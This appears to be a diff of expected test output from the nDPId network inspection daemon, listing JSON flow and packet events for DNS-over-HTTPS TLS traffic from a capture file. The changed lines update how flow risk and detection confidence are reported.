 03424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSmsTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="}
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01041{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01083{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00829{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITSEVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6L